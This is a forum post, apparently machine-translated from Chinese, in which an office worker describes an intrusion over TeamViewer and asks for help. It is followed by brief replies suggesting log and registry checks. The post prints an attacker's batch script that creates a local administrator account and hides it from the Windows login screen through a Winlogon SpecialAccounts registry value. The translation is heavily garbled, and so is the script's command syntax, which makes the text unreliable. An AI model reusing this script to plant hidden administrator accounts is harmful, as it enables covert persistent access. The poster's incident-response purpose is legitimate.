Before the National Day holiday, in order to prevent one thousand, my office computer is turned off, and open TeamViewer for leadership temporarily make a phone call to want what data
During the holiday, the company all the holiday, the office is locked
Today go to work on the first day, passive, found that the computer TeamViewer is turned off, the computer in the cancellation of interface, because usually used in company Intranet use MSTSC to control your computer, so was thought wrong
Desktop more two things, one is Google Chrome installation file, is the English version, the other one is called "Hidden - User. Bat batch file, see the file name alone very ominous
Right-click the two files, display creation time is around 2 o 'clock in the morning of October 2, the time the company can't someone from the Intranet of the remote I
Open the batch file with notepad, below is the code -
CD \
CLS
REM "Mr_hosseinazer/hide the user"
REM -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
@ echo off
The set/p=do user Enter Desired Username:
The set/p=do pass the Enter Desired Password:
Net user/pass the add % user % % %
.net localgroup administrators/add % user %
Reg the add in registry key HKLM \ Software \ Microsoft \ "Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ Userlist" REG_DWORD % user %/t/d/v 0
Pause
I could probably understand, a man called "hussein azeri" to write the script, use is to input the user name and password, create a system administrator role of the user name and password, the section of registry ordered below is why I don't know
Into the local users and groups, but I didn't find any new administrator role, so the man created should be deleted
Applications also can not find the Google browser, should also be uninstalled
Windows log on the inside left a lot of operating records, from October 1 until October 3, but the article records the number of too many, I don't see clue
Now I fear is the invasion of people is to the company database to move hands and feet, because I is saved into database password
And how do you know the man to my computer which changes, whether to have to reinstall the
The final path is the invasion of this guy, should be use TeamViewer remote I at the beginning, the TeamViewer logging on October 1st a new computer and I set up a connection, but on the day of the TeamViewer is closed, so the guy is to use other ways to control my computer
Under the comb is there anyone know the offensive and defensive great god, help me I have what loophole to catch up on?

CodePudding user response:

CodePudding user response:

The machine broken network, first check the server logs, and then look to whether have the operation, the machine log to see whether there is record
The registry is should be to give your administrator and user group account, may not be displayed,
Check the registry keys,
Teamviewer login time this should be a LOG,